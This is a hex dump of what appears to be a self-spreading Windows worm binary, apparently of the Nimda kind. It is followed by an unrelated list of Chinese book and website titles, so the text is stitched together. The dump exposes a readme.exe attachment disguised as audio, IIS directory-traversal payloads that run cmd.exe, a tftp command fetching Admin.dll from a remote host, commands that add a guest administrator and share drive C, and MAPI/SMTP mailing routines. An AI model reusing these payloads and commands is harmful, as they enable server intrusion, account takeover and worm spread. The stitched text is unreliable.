3D 21DEF_== :36179338 3D 3D 2D 2D 0D 0A 0D 0A ==--.... :36179340 2D 2D 3D 3D 3D 3D 5F 41 --====_A :36179348 42 43 31 32 33 34 35 36 BC123456 :36179350 37 38 39 30 44 45 46 5F 7890DEF_ :36179358 3D 3D 3D 3D 0D 0A 43 6F ====..Co :36179360 6E 74 65 6E 74 2D 54 79 ntent-Ty :36179368 70 65 3A 20 61 75 64 69 pe: audi :36179370 6F 2F 78 2D 77 61 76 3B o/x-wav; :36179378 0D 0A 09 6E 61 6D 65 3D ...name= :36179380 22 72 65 61 64 6D 65 2E "readme. :36179388 65 78 65 22 0D 0A 43 6F exe"..Co :36179390 6E 74 65 6E 74 2D 54 72 ntent-Tr :36179398 61 6E 73 66 65 72 2D 45 ansfer-E :361793A0 6E 63 6F 64 69 6E 67 3A ncoding: :361793A8 20 62 61 73 65 36 34 0D base64. :361793B0 0A 43 6F 6E 74 65 6E 74 .Content :361793B8 2D 49 44 3A 20 3C 45 41 -ID: <EA :361793C0 34 44 4D 47 42 50 39 70 4DMGBP9p :361793C8 3E 0D 0A 0D 0A 00 00 00 >....... :361793D0 0D 0A 0D 0A 2D 2D 3D 3D ....--== :361793D8 3D 3D 5F 41 42 43 31 32 ==_ABC12 :361793E0 33 34 35 36 37 38 39 30 34567890 :361793E8 44 45 46 5F 3D 3D 3D 3D DEF_==== :361793F0 0D 0A 0D 0A 00 00 00 00 ........ :361793F8 4E 55 4C 3D 00 00 00 00 NUL=.... :36179400 0D 0A 0D 0A 5B 72 65 6E ....[ren :36179408 61 6D 65 5D 0D 0A 00 00 ame].... :36179410 5C 77 69 6E 69 6E 69 74 \\wininit :36179418 2E 69 6E 69 00 00 00 00 .ini.... :36179420 43 3A 5C 00 50 65 72 73 C:\\.Pers :36179428 6F 6E 61 6C 00 00 00 00 onal.... :36179430 53 6F 66 74 77 61 72 65 Software :36179438 5C 4D 69 63 72 6F 73 6F \\Microso :36179440 66 74 5C 57 69 6E 64 6F ft\\Windo :36179448 77 73 5C 43 75 72 72 65 ws\\Curre :36179450 6E 74 56 65 72 73 69 6F ntVersio :36179458 6E 5C 45 78 70 6C 6F 72 n\\Explor :36179460 65 72 5C 53 68 65 6C 6C er\\Shell :36179468 20 46 6F 6C 64 65 72 73 Folders :36179470 00 00 00 00 5C 00 00 00 ....\\... :36179478 2E 2E 00 00 5C 2A 2E 2A ....\\.* :36179480 00 00 00 00 04 00 00 80 ........ :36179488 02 00 00 80 45 58 50 4C ....EXPL :36179490 4F 52 45 52 00 00 00 00 ORER.... :36179498 66 73 64 68 71 68 65 72 fsdhqher :361794A0 77 71 69 32 30 30 31 00 wqi2001. :361794A8 53 59 53 54 45 4D 5C 43 SYSTEM\\C :361794B0 75 72 72 65 6E 74 43 6F urrentCo :361794B8 6E 74 72 6F 6C 53 65 74 ntrolSet :361794C0 5C 53 65 72 76 69 63 65 \\Service :361794C8 73 5C 6C 61 6E 6D 61 6E s\\lanman :361794D0 73 65 72 76 65 72 5C 53 server\\S :361794D8 68 61 72 65 73 5C 53 65 hares\\Se :361794E0 63 75 72 69 74 79 00 00 curity.. :361794E8 73 68 61 72 65 20 63 24 share c$ :361794F0 3D 63 3A 5C 00 00 00 00 =c:\\.... :361794F8 75 73 65 72 20 67 75 65 user gue :36179500 73 74 20 22 22 00 00 00 st ""... :36179508 6C 6F 63 61 6C 67 72 6F localgro :36179510 75 70 20 41 64 6D 69 6E up Admin :36179518 69 73 74 72 61 74 6F 72 istrator :36179520 73 20 67 75 65 73 74 20 s guest :36179528 2F 61 64 64 00 00 00 00 /add.... :36179530 6C 6F 63 61 6C 67 72 6F localgro :36179538 75 70 20 47 75 65 73 74 up Guest :36179540 73 20 67 75 65 73 74 20 s guest :36179548 2F 61 64 64 00 00 00 00 /add.... :36179550 75 73 65 72 20 67 75 65 user gue :36179558 73 74 20 2F 61 63 74 69 st /acti :36179560 76 65 00 00 6F 70 65 6E ve..open :36179568 00 00 00 00 75 73 65 72 ....user :36179570 20 67 75 65 73 74 20 2F guest / :36179578 61 64 64 00 6E 65 74 00 :36179580 48 69 64 65 46 69 6C 65 HideFile :36179588 45 78 74 00 53 68 6F 77 Ext.Show :36179590 53 75 70 65 72 48 69 64 SuperHid :36179598 64 65 6E 00 48 69 64 64 den.Hidd :361795A0 65 6E 00 00 53 6F 66 74 en..Soft :361795A8 77 61 72 65 5C 4D 69 63 ware\\Mic :361795B0 72 6F 73 6F 66 74 5C 57 rosoft\\W :361795B8 69 6E 64 6F 77 73 5C 43 indows\\C :361795C0 75 72 72 65 6E 74 56 65 urrentVe :361795C8 72 73 69 6F 6E 5C 45 78 rsion\\Ex :361795D0 70 6C 6F 72 65 72 5C 41 plorer\\A :361795D8 64 76 61 6E 63 65 64 00 dvanced. :361795E0 25 6C 73 00 5C 5C 25 73 %ls.\\\\%s :361795E8 00 00 00 00 25 6C 64 20 ....%ld :361795F0 25 6C 64 20 25 6C 64 00 %ld %ld. :361795F8 25 6C 64 20 25 6C 64 00 %ld %ld. :36179600 49 6D 61 67 65 20 53 70 Image Sp :36179608 61 63 65 20 45 78 65 63 ace Exec :36179610 20 57 72 69 74 65 20 43 Write C :36179618 6F 70 79 00 49 6D 61 67 opy.Imag :36179620 65 20 53 70 61 63 65 20 e Space :36179628 45 78 65 63 20 52 65 61 Exec Rea :36179630 64 2F 57 72 69 74 65 00 d/Write. :36179638 49 6D 61 67 65 20 53 70 Image Sp :36179640 61 63 65 20 45 78 65 63 ace Exec :36179648 20 52 65 61 64 20 4F 6E Read On :36179650 6C 79 00 00 49 6D 61 67 ly..Imag :36179658 65 20 53 70 61 63 65 20 e Space :36179660 45 78 65 63 75 74 61 62 Executab :36179668 6C 65 00 00 49 6D 61 67 le..Imag :36179670 65 20 53 70 61 63 65 20 e Space :36179678 57 72 69 74 65 20 43 6F Write Co :36179680 70 79 00 00 49 6D 61 67 py..Imag :36179688 65 20 53 70 61 63 65 20 e Space :36179690 52 65 61 64 2F 57 72 69 Read/Wri :36179698 74 65 00 00 49 6D 61 67 te..Imag :361796A0 65 20 53 70 61 63 65 20 e Space :361796A8 52 65 61 64 20 4F 6E 6C Read Onl :361796B0 79 00 00 00 49 6D 61 67 y...Imag :361796B8 65 20 53 70 61 63 65 20 e Space :361796C0 4E 6F 20 41 63 63 65 73 No Acces :361796C8 73 00 00 00 4D 61 70 70 s...Mapp :361796D0 65 64 20 53 70 61 63 65 ed Space :361796D8 20 45 78 65 63 20 57 72 Exec Wr :361796E0 69 74 65 20 43 6F 70 79 ite Copy :361796E8 00 00 00 00 4D 61 70 70 ....Mapp :361796F0 65 64 20 53 70 61 63 65 ed Space :361796F8 20 45 78 65 63 20 52 65 Exec Re :36179700 61 64 2F 57 72 69 74 65 ad/Write :36179708 00 00 00 00 4D 61 70 70 ....Mapp :36179710 65 64 20 53 70 61 63 65 ed Space :36179718 20 45 78 65 63 20 52 65 Exec Re :36179720 61 64 20 4F 6E 6C 79 00 ad Only. :36179728 4D 61 70 70 65 64 20 53 Mapped S :36179730 70 61 63 65 20 45 78 65 pace Exe :36179738 63 75 74 61 62 6C 65 00 cutable. :36179740 4D 61 70 70 65 64 20 53 Mapped S :36179748 70 61 63 65 20 57 72 69 pace Wri :36179750 74 65 20 43 6F 70 79 00 te Copy. :36179758 4D 61 70 70 65 64 20 53 Mapped S :36179760 70 61 63 65 20 52 65 61 pace Rea :36179768 64 2F 57 72 69 74 65 00 d/Write. :36179770 4D 61 70 70 65 64 20 53 Mapped S :36179778 70 61 63 65 20 52 65 61 pace Rea :36179780 64 20 4F 6E 6C 79 00 00 d Only.. :36179788 4D 61 70 70 65 64 20 53 Mapped S :36179790 70 61 63 65 20 4E 6F 20 pace No :36179798 41 63 63 65 73 73 00 00 Access.. :361797A0 52 65 73 65 72 76 65 64 Reserved :361797A8 20 53 70 61 63 65 20 45 Space E :361797B0 78 65 63 20 57 72 69 74 xec Writ :361797B8 65 20 43 6F 70 79 00 00 e Copy.. :361797C0 52 65 73 65 72 76 65 64 Reserved :361797C8 20 53 70 61 63 65 20 45 Space E :361797D0 78 65 63 20 52 65 61 64 xec Read :361797D8 2F 57 72 69 74 65 00 00 /Write.. :361797E0 52 65 73 65 72 76 65 64 Reserved :361797E8 20 53 70 61 63 65 20 45 Space E :361797F0 78 65 63 20 52 65 61 64 xec Read :361797F8 20 4F 6E 6C 79 00 00 00 Only... :36179800 52 65 73 65 72 76 65 64 Reserved :36179808 20 53 70 61 63 65 20 45 Space E :36179810 78 65 63 75 74 61 62 6C xecutabl :36179818 65 00 00 00 52 65 73 65 e...Rese :36179820 72 76 65 64 20 53 70 61 rved Spa :36179828 63 65 20 57 72 69 74 65 ce Write :36179830 20 43 6F 70 79 00 00 00 Copy... :36179838 52 65 73 65 72 76 65 64 Reserved :36179840 20 53 70 61 63 65 20 52 Space R :36179848 65 61 64 2F 57 72 69 74 ead/Writ :36179850 65 00 00 00 52 65 73 65 e...Rese :36179858 72 76 65 64 20 53 70 61 rved Spa :36179860 63 65 20 52 65 61 64 20 ce Read :36179868 4F 6E 6C 79 00 00 00 00 Only.... :36179870 52 65 73 65 72 76 65 64 Reserved :36179878 20 53 70 61 63 65 20 4E Space N :36179880 6F 20 41 63 63 65 73 73 o Access :36179888 00 00 00 00 50 72 6F 63 ....Proc :36179890 65 73 73 20 41 64 64 72 ess Addr :36179898 65 73 73 20 53 70 61 63 ess Spac :361798A0 65 00 00 00 45 78 65 63 e...Exec :361798A8 20 57 72 69 74 65 20 43 Write C :361798B0 6F 70 79 00 45 78 65 63 opy.Exec :361798B8 20 52 65 61 64 2F 57 72 Read/Wr :361798C0 69 74 65 00 45 78 65 63 ite.Exec :361798C8 20 52 65 61 64 20 4F 6E Read On :361798D0 6C 79 00 00 45 78 65 63 ly..Exec :361798D8 75 74 61 62 6C 65 00 00 utable.. :361798E0 57 72 69 74 65 20 43 6F Write Co :361798E8 70 79 00 00 52 65 61 64 py..Read :361798F0 2F 57 72 69 74 65 00 00 /Write.. :361798F8 52 65 61 64 20 4F 6E 6C Read Onl :36179900 79 00 00 00 4E 6F 20 41 y...No A :36179908 63 63 65 73 73 00 00 00 ccess... :36179910 49 6D 61 67 65 00 00 00 Image... :36179918 55 73 65 72 20 50 43 00 User PC. :36179920 54 68 72 65 61 64 20 44 Thread D :36179928 65 74 61 69 6C 73 00 00 etails.. :36179930 49 44 20 54 68 72 65 61 ID Threa :36179938 64 00 00 00 50 72 69 6F d...Prio :36179940 72 69 74 79 20 43 75 72 rity Cur :36179948 72 65 6E 74 00 00 00 00 rent.... :36179950 43 6F 6E 74 65 78 74 20 Context :36179958 53 77 69 74 63 68 65 73 Switches :36179960 2F 73 65 63 00 00 00 00 /sec.... :36179968 53 74 61 72 74 20 41 64 Start Ad :36179970 64 72 65 73 73 00 00 00 dress... :36179978 54 68 72 65 61 64 00 00 Thread.. :36179980 50 61 67 65 20 46 61 75 Page Fau :36179988 6C 74 73 2F 73 65 63 00 lts/sec. :36179990 56 69 72 74 75 61 6C 20 Virtual :36179998 42 79 74 65 73 20 50 65 Bytes Pe :361799A0 61 6B 00 00 56 69 72 74 ak..Virt :361799A8 75 61 6C 20 42 79 74 65 ual Byte :361799B0 73 00 00 00 50 72 69 76 s...Priv :361799B8 61 74 65 20 42 79 74 65 ate Byte :361799C0 73 00 00 00 49 44 20 50 s...ID P :361799C8 72 6F 63 65 73 73 00 00 rocess.. :361799D0 45 6C 61 70 73 65 64 20 Elapsed :361799D8 54 69 6D 65 00 00 00 00 Time.... :361799E0 50 72 69 6F 72 69 74 79 Priority :361799E8 20 42 61 73 65 00 00 00 Base... :361799F0 57 6F 72 6B 69 6E 67 20 Working :361799F8 53 65 74 20 50 65 61 6B Set Peak :36179A00 00 00 00 00 57 6F 72 6B ....Work :36179A08 69 6E 67 20 53 65 74 00 ing Set. :36179A10 25 20 55 73 65 72 20 54 % User T :36179A18 69 6D 65 00 25 20 50 72 ime.% Pr :36179A20 69 76 69 6C 65 67 65 64 ivileged :36179A28 20 54 69 6D 65 00 00 00 Time... :36179A30 25 20 50 72 6F 63 65 73 % Proces :36179A38 73 6F 72 20 54 69 6D 65 sor Time :36179A40 00 00 00 00 50 72 6F 63 ....Proc :36179A48 65 73 73 00 43 6F 75 6E ess.Coun :36179A50 74 65 72 20 30 30 39 00 ter 009. :36179A58 73 6F 66 74 77 61 72 65 software :36179A60 5C 6D 69 63 72 6F 73 6F \\microso :36179A68 66 74 5C 77 69 6E 64 6F ft\\windo :36179A70 77 73 20 6E 74 5C 63 75 ws nt\\cu :36179A78 72 72 65 6E 74 76 65 72 rrentver :36179A80 73 69 6F 6E 5C 70 65 72 sion\\per :36179A88 66 6C 69 62 5C 30 30 39 flib\\009 :36179A90 00 00 00 00 43 6F 75 6E ....Coun :36179A98 74 65 72 73 00 00 00 00 ters.... :36179AA0 56 65 72 73 69 6F 6E 00 Version. :36179AA8 4C 61 73 74 20 43 6F 75 Last Cou :36179AB0 6E 74 65 72 00 00 00 00 nter.... :36179AB8 73 6F 66 74 77 61 72 65 software :36179AC0 5C 6D 69 63 72 6F 73 6F \\microso :36179AC8 66 74 5C 77 69 6E 64 6F ft\\windo :36179AD0 77 73 20 6E 74 5C 63 75 ws nt\\cu :36179AD8 72 72 65 6E 74 76 65 72 rrentver :36179AE0 73 69 6F 6E 5C 70 65 72 sion\\per :36179AE8 66 6C 69 62 00 00 00 00 flib.... :36179AF0 2F 73 63 72 69 70 74 73 /scripts :36179AF8 00 00 00 00 2F 4D 53 41 ..../MSA :36179B00 44 43 00 00 2F 63 00 00 DC../c.. :36179B08 2F 64 00 00 2F 73 63 72 /d../scr :36179B10 69 70 74 73 2F 2E 2E 25 ipts/..% :36179B18 32 35 35 63 2E 2E 00 00 255c.... :36179B20 2F 5F 76 74 69 5F 62 69 /_vti_bi :36179B28 6E 2F 2E 2E 25 32 35 35 n/..%255 :36179B30 63 2E 2E 2F 2E 2E 25 32 c../..%2 :36179B38 35 35 63 2E 2E 2F 2E 2E 55c../.. :36179B40 25 32 35 35 63 2E 2E 00 %255c... :36179B48 2F 5F 6D 65 6D 5F 62 69 /_mem_bi :36179B50 6E 2F 2E 2E 25 32 35 35 n/..%255 :36179B58 63 2E 2E 2F 2E 2E 25 32 c../..%2 :36179B60 35 35 63 2E 2E 2F 2E 2E 55c../.. :36179B68 25 32 35 35 63 2E 2E 00 %255c... :36179B70 2F 6D 73 61 64 63 2F 2E /msadc/. :36179B78 2E 25 32 35 35 63 2E 2E .%255c.. :36179B80 2F 2E 2E 25 32 35 35 63 /..%255c :36179B88 2E 2E 2F 2E 2E 25 32 35 ../..%25 :36179B90 35 63 2F 2E 2E 25 63 31 5c/..%c1 :36179B98 25 31 63 2E 2E 2F 2E 2E %1c../.. :36179BA0 25 63 31 25 31 63 2E 2E %c1%1c.. :36179BA8 2F 2E 2E 25 63 31 25 31 /..%c1%1 :36179BB0 63 2E 2E 00 2F 73 63 72 c.../scr :36179BB8 69 70 74 73 2F 2E 2E 25 ipts/..% :36179BC0 63 31 25 31 63 2E 2E 00 c1%1c... :36179BC8 2F 73 63 72 69 70 74 73 /scripts :36179BD0 2F 2E 2E 25 63 30 25 32 /..%c0%2 :36179BD8 66 2E 2E 00 2F 73 63 72 f.../scr :36179BE0 69 70 74 73 2F 2E 2E 25 ipts/..% :36179BE8 63 30 25 61 66 2E 2E 00 c0%af... :36179BF0 2F 73 63 72 69 70 74 73 /scripts :36179BF8 2F 2E 2E 25 63 31 25 39 /..%c1%9 :36179C00 63 2E 2E 00 2F 73 63 72 c.../scr :36179C08 69 70 74 73 2F 2E 2E 25 ipts/..% :36179C10 25 33 35 25 36 33 2E 2E %35%63.. :36179C18 00 00 00 00 2F 73 63 72 ..../scr :36179C20 69 70 74 73 2F 2E 2E 25 ipts/..% :36179C28 25 33 35 63 2E 2E 00 00 %35c.... :36179C30 2F 73 63 72 69 70 74 73 /scripts :36179C38 2F 2E 2E 25 32 35 25 33 /..%25%3 :36179C40 35 25 36 33 2E 2E 00 00 5%63.... :36179C48 2F 73 63 72 69 70 74 73 /scripts :36179C50 2F 2E 2E 25 32 35 32 66 /..%252f :36179C58 2E 2E 00 00 2F 72 6F 6F ..../roo :36179C60 74 2E 65 78 65 3F 2F 63 t.exe?/c :36179C68 2B 00 00 00 2F 77 69 6E +.../win :36179C70 6E 74 2F 73 79 73 74 65 nt/syste :36179C78 6D 33 32 2F 63 6D 64 2E m32/cmd. :36179C80 65 78 65 3F 2F 63 2B 00 exe?/c+. :36179C88 6E 65 74 25 25 32 30 75 net%%20u :36179C90 73 65 25 25 32 30 5C 5C se%%20\\\\ :36179C98 25 73 5C 69 70 63 24 25 %s\\ipc$% :36179CA0 25 32 30 22 22 25 25 32 %20""%%2 :36179CA8 30 2F 75 73 65 72 3A 22 0/user:" :36179CB0 67 75 65 73 74 22 00 00 guest".. :36179CB8 74 66 74 70 25 25 32 30 tftp%%20 :36179CC0 2D 69 25 25 32 30 25 73 -i%%20%s :36179CC8 25 25 32 30 47 45 54 25 %%20GET% :36179CD0 25 32 30 41 64 6D 69 6E %20Admin :36179CD8 2E 64 6C 6C 25 25 32 30 .dll%%20 :36179CE0 00 00 00 00 41 64 6D 69 ....Admi :36179CE8 6E 2E 64 6C 6C 00 00 00 n.dll... :36179CF0 63 3A 5C 41 64 6D 69 6E c:\\Admin :36179CF8 2E 64 6C 6C 00 00 00 00 .dll.... :36179D00 64 3A 5C 41 64 6D 69 6E d:\\Admin :36179D08 2E 64 6C 6C 00 00 00 00 .dll.... :36179D10 65 3A 5C 41 64 6D 69 6E e:\\Admin :36179D18 2E 64 6C 6C 00 00 00 00 .dll.... :36179D20 0D 0A 3C 68 74 6D 6C 3E ..<html> :36179D28 3C 73 63 72 69 70 74 20 <script :36179D30 6C 61 6E 67 75 61 67 65 language :36179D38 3D 22 4A 61 76 61 53 63 ="JavaSc :36179D40 72 69 70 74 22 3E 77 69 ript">wi :36179D48 6E 64 6F 77 2E 6F 70 65 ndow.ope :36179D50 6E 28 22 72 65 61 64 6D n("readm :36179D58 65 2E 65 6D 6C 22 2C 20 e.eml", :36179D60 6E 75 6C 6C 2C 20 22 72 null, "r :36179D68 65 73 69 7A 61 62 6C 65 esizable :36179D70 3D 6E 6F 2C 74 6F 70 3D =no,top= :36179D78 36 30 30 30 2C 6C 65 66 6000,lef :36179D80 74 3D 36 30 30 30 22 29 t=6000") :36179D88 3C 2F 73 63 72 69 70 74 </script :36179D90 3E 3C 2F 68 74 6D 6C 3E ></html> :36179D98 00 00 00 00 2F 41 64 6D ..../Adm :36179DA0 69 6E 2E 64 6C 6C 00 00 in.dll.. :36179DA8 64 69 72 00 47 45 54 20 dir.GET :36179DB0 25 73 20 48 54 54 50 2F %s HTTP/ :36179DB8 31 2E 30 0D 0A 48 6F 73 1.0..Hos :36179DC0 74 3A 20 77 77 77 0D 0A t: www.. :36179DC8 43 6F 6E 6E 6E 65 63 74 Connnect :36179DD0 69 6F 6E 3A 20 63 6C 6F ion: clo :36179DD8 73 65 0D 0A 0D 0A 00 00 se...... :36179DE0 63 3A 00 00 72 65 61 64 c:..read :36179DE8 6D 65 00 00 6D 61 69 6E me..main :36179DF0 00 00 00 00 69 6E 64 65 ....inde :36179DF8 78 00 00 00 64 65 66 61 x...defa :36179E00 75 6C 74 00 68 74 6D 6C ult.html :36179E08 00 00 00 00 2E 61 73 70 .....asp :36179E10 00 00 00 00 2E 68 74 6D .....htm :36179E18 00 00 00 00 5C 72 65 61 ....\\rea :36179E20 64 6D 65 2E 65 6D 6C 00 dme.eml. :36179E28 2E 65 78 65 00 00 00 00 .exe.... :36179E30 6D 65 70 00 77 69 6E 7A mep.winz :36179E38 69 70 33 32 2E 65 78 65 ip32.exe :36179E40 00 00 00 00 72 69 63 68 ....rich :36179E48 65 64 32 30 2E 64 6C 6C ed20.dll :36179E50 00 00 00 00 2E 6E 77 73 .....nws :36179E58 00 00 00 00 2E 65 6D 6C .....eml :36179E60 00 00 00 00 2E 64 6F 63 .....doc :36179E68 00 00 00 00 20 2E 65 78 .... .ex :36179E70 65 00 00 00 64 6F 6E 74 e...dont :36179E78 72 75 6E 6F 6C 64 00 00 runold.. :36179E80 69 6F 63 74 6C 73 6F 63 ioctlsoc :36179E88 6B 65 74 00 67 65 74 68 ket.geth :36179E90 6F 73 74 62 79 6E 61 6D ostbynam :36179E98 65 00 00 00 67 65 74 68 e...geth :36179EA0 6F 73 74 6E 61 6D 65 00 ostname. :36179EA8 69 6E 65 74 5F 6E 74 6F inet_nto :36179EB0 61 00 00 00 69 6E 65 74 a...inet :36179EB8 5F 61 64 64 72 00 00 00 _addr... :36179EC0 6E 74 6F 68 6C 00 00 00 ntohl... :36179EC8 68 74 6F 6E 6C 00 00 00 htonl... :36179ED0 6E 74 6F 68 73 00 00 00 ntohs... :36179ED8 68 74 6F 6E 73 00 00 00 htons... :36179EE0 63 6C 6F 73 65 73 6F 63 closesoc :36179EE8 6B 65 74 00 73 65 6C 65 ket.sele :36179EF0 63 74 00 00 73 65 6E 64 ct..send :36179EF8 74 6F 00 00 73 65 6E 64 to..send :36179F00 00 00 00 00 72 65 63 76 ....recv :36179F08 66 72 6F 6D 00 00 00 00 from.... :36179F10 72 65 63 76 00 00 00 00 recv.... :36179F18 62 69 6E 64 00 00 00 00 bind.... :36179F20 63 6F 6E 6E 65 63 74 00 connect. :36179F28 73 6F 63 6B 65 74 00 00 socket.. :36179F30 5F 5F 57 53 41 46 44 49 __WSAFDI :36179F38 73 53 65 74 00 00 00 00 sSet.... :36179F40 57 53 41 43 6C 65 61 6E WSAClean :36179F48 75 70 00 00 57 53 41 53 up..WSAS :36179F50 74 61 72 74 75 70 00 00 tartup.. :36179F58 77 73 32 5F 33 32 2E 64 ws2_32.d :36179F60 6C 6C 00 00 4D 41 50 49 ll..MAPI :36179F68 4C 6F 67 6F 66 66 00 00 Logoff.. :36179F70 4D 41 50 49 53 65 6E 64 MAPISend :36179F78 4D 61 69 6C 00 00 00 00 Mail.... :36179F80 4D 41 50 49 46 72 65 65 MAPIFree :36179F88 42 75 66 66 65 72 00 00 Buffer.. :36179F90 4D 41 50 49 52 65 61 64 MAPIRead :36179F98 4D 61 69 6C 00 00 00 00 Mail.... :36179FA0 4D 41 50 49 46 69 6E 64 MAPIFind :36179FA8 4E 65 78 74 00 00 00 00 Next.... :36179FB0 4D 41 50 49 52 65 73 6F MAPIReso :36179FB8 6C 76 65 4E 61 6D 65 00 lveName. :36179FC0 4D 41 50 49 4C 6F 67 6F MAPILogo :36179FC8 6E 00 00 00 4D 41 50 49 n...MAPI :36179FD0 33 32 2E 44 4C 4C 00 00 32.DLL.. :36179FD8 57 4E 65 74 41 64 64 43 WNetAddC :36179FE0 6F 6E 6E 65 63 74 69 6F onnectio :36179FE8 6E 32 41 00 57 4E 65 74 n2A.WNet :36179FF0 43 61 6E 63 65 6C 43 6F CancelCo :36179FF8 6E 6E 65 63 74 69 6F 6E nnection :3617A000 32 41 00 00 57 4E 65 74 2A..WNet :3617A008 4F 70 65 6E 45 6E 75 6D OpenEnum :3617A010 41 00 00 00 57 4E 65 74 A...WNet :3617A018 45 6E 75 6D 52 65 73 6F EnumReso :3617A020 75 72 63 65 41 00 00 00 urceA... :3617A028 57 4E 65 74 43 6C 6F 73 WNetClos :3617A030 65 45 6E 75 6D 00 00 00 eEnum... :3617A038 4D 50 52 2E 44 4C 4C 00 MPR.DLL. :3617A040 53 68 65 6C 6C 45 78 65 ShellExe :3617A048 63 75 74 65 41 00 00 00 cuteA... :3617A050 53 48 45 4C 4C 33 32 2E SHELL32. :3617A058 44 4C 4C 00 52 65 67 69 DLL.Regi :3617A060 73 74 65 72 53 65 72 76 sterServ :3617A068 69 63 65 50 72 6F 63 65 iceProce :3617A070 73 73 00 00 56 69 72 74 ss..Virt :3617A078 75 61 6C 46 72 65 65 45 ualFreeE :3617A080 78 00 00 00 56 69 72 74 x...Virt :3617A088 75 61 6C 51 75 65 72 79 ualQuery :3617A090 45 78 00 00 56 69 72 74 Ex..Virt :3617A098 75 61 6C 41 6C 6C 6F 63 ualAlloc :3617A0A0 45 78 00 00 56 69 72 74 Ex..Virt :3617A0A8 75 61 6C 50 72 6F 74 65 ualProte :3617A0B0 63 74 45 78 00 00 00 00 ctEx.... :3617A0B8 43 72 65 61 74 65 52 65 CreateRe :3617A0C0 6D 6F 74 65 54 68 72 65 moteThre :3617A0C8 61 64 00 00 48 65 61 70 ad..Heap :3617A0D0 43 6F 6D 70 61 63 74 00 Compact. :3617A0D8 48 65 61 70 46 72 65 65 HeapFree :3617A0E0 00 00 00 00 48 65 61 70 ....Heap :3617A0E8 41 6C 6C 6F 63 00 00 00 Alloc... :3617A0F0 48 65 61 70 44 65 73 74 HeapDest :3617A0F8 72 6F 79 00 48 65 61 70 roy.Heap :3617A100 43 72 65 61 74 65 00 00 Create.. :3617A108 4B 45 52 4E 45 4C 33 32 KERNEL32 :3617A110 2E 44 4C 4C 00 00 00 00 .DLL.... :3617A118 53 4F 46 54 57 41 52 45 SOFTWARE :3617A120 5C 4D 69 63 72 6F 73 6F \\Microso :3617A128 66 74 5C 57 69 6E 64 6F ft\\Windo :3617A130 77 73 5C 43 75 72 72 65 ws\\Curre :3617A138 6E 74 56 65 72 73 69 6F ntVersio :3617A140 6E 5C 41 70 70 20 50 61 n\\App Pa :3617A148 74 68 73 5C 00 00 00 00 ths\\.... :3617A150 53 4F 46 54 57 41 52 45 SOFTWARE :3617A158 5C 4D 69 63 72 6F 73 6F \\Microso :3617A160 66 74 5C 57 69 6E 64 6F ft\\Windo :3617A168 77 73 5C 43 75 72 72 65 ws\\Curre :3617A170 6E 74 56 65 72 73 69 6F ntVersio :3617A178 6E 5C 41 70 70 20 50 61 n\\App Pa :3617A180 74 68 73 00 54 79 70 65 ths.Type :3617A188 00 00 00 00 52 65 6D 61 ....Rema :3617A190 72 6B 00 00 58 3A 5C 00 rk..X:\\. :3617A198 53 4F 46 54 57 41 52 45 SOFTWARE :3617A1A0 5C 4D 69 63 72 6F 73 6F \\Microso :3617A1A8 66 74 5C 57 69 6E 64 6F ft\\Windo :3617A1B0 77 73 5C 43 75 72 72 65 ws\\Curre :3617A1B8 6E 74 56 65 72 73 69 6F ntVersio :3617A1C0 6E 5C 4E 65 74 77 6F 72 n\etwor :3617A1C8 6B 5C 4C 61 6E 4D 61 6E k\\LanMan :3617A1D0 5C 58 24 00 50 61 72 6D \\X$.Parm :3617A1D8 32 65 6E 63 00 00 00 00 2enc.... :3617A1E0 50 61 72 6D 31 65 6E 63 Parm1enc :3617A1E8 00 00 00 00 46 6C 61 67 ....Flag :3617A1F0 73 00 00 00 50 61 74 68 s...Path :3617A1F8 00 00 00 00 53 4F 46 54 ....SOFT :3617A200 57 41 52 45 5C 4D 69 63 WARE\\Mic :3617A208 72 6F 73 6F 66 74 5C 57 rosoft\\W :3617A210 69 6E 64 6F 77 73 5C 43 indows\\C :3617A218 75 72 72 65 6E 74 56 65 urrentVe :3617A220 72 73 69 6F 6E 5C 4E 65 rsion\e :3617A228 74 77 6F 72 6B 5C 4C 61 twork\\La :3617A230 6E 4D 61 6E 5C 00 00 00 nMan\\... :3617A238 53 4F 46 54 57 41 52 45 SOFTWARE :3617A240 5C 4D 69 63 72 6F 73 6F \\Microso :3617A248 66 74 5C 57 69 6E 64 6F ft\\Windo :3617A250 77 73 5C 43 75 72 72 65 ws\\Curre :3617A258 6E 74 56 65 72 73 69 6F ntVersio :3617A260 6E 5C 4E 65 74 77 6F 72 n\etwor :3617A268 6B 5C 4C 61 6E 4D 61 6E k\\LanMan :3617A270 00 00 00 00 53 59 53 54 ....SYST :3617A278 45 4D 5C 43 75 72 72 65 EM\\Curre :3617A280 6E 74 43 6F 6E 74 72 6F ntContro :3617A288 6C 53 65 74 5C 53 65 72 lSet\\Ser :3617A290 76 69 63 65 73 5C 6C 61 vices\\la :3617A298 6E 6D 61 6E 73 65 72 76 nmanserv :3617A2A0 65 72 5C 53 68 61 72 65 er\\Share :3617A2A8 73 00 00 00 0D 0A 00 00 s....... :3617A2B0 43 61 63 68 65 00 00 00 Cache... :3617A2B8 53 6F 66 74 77 61 72 65 Software :3617A2C0 5C 4D 69 63 72 6F 73 6F \\Microso :3617A2C8 66 74 5C 57 69 6E 64 6F ft\\Windo :3617A2D0 77 73 5C 43 75 72 72 65 ws\\Curre :3617A2D8 6E 74 56 65 72 73 69 6F ntVersio :3617A2E0 6E 5C 45 78 70 6C 6F 72 n\\Explor :3617A2E8 65 72 5C 4D 61 70 4D 61 er\\MapMa :3617A2F0 69 6C 00 00 51 55 49 54 il..QUIT :3617A2F8 0D 0A 00 00 2E 0D 0A 00 ........ :3617A300 53 75 62 6A 65 63 74 3A Subject: :3617A308 20 00 00 00 46 72 6F 6D ...From :3617A310 3A 20 3C 00 44 41 54 41 : <.DATA :3617A318 0D 0A 00 00 52 43 50 54 ....RCPT
随便看	中国发达地区农地使用权流转问题研究中国发达地区社会保障--来自浙江的报告中国发电中国发电采购网中国发电能源供需与电源发展分析报告中国发明与专利中国发明专利网中国发票史：发票源流探考记中国发式习俗史中国发现中国发现文化卷II:文化的格调中国发艺品网中国发展报告2010 中国发展报告2010：促进人的发展的中国新型城市化战略中国发展大战略：从毛泽东到邓小平中国发展道路的理论支撑中国发展的国际效应中国发展模式研究中国发展评论中国发展若干问题探讨中国发展数字地图中国发展新闻学概论中国发展型社会政策论纲中国发展研究院中国发展油页岩产业的可行性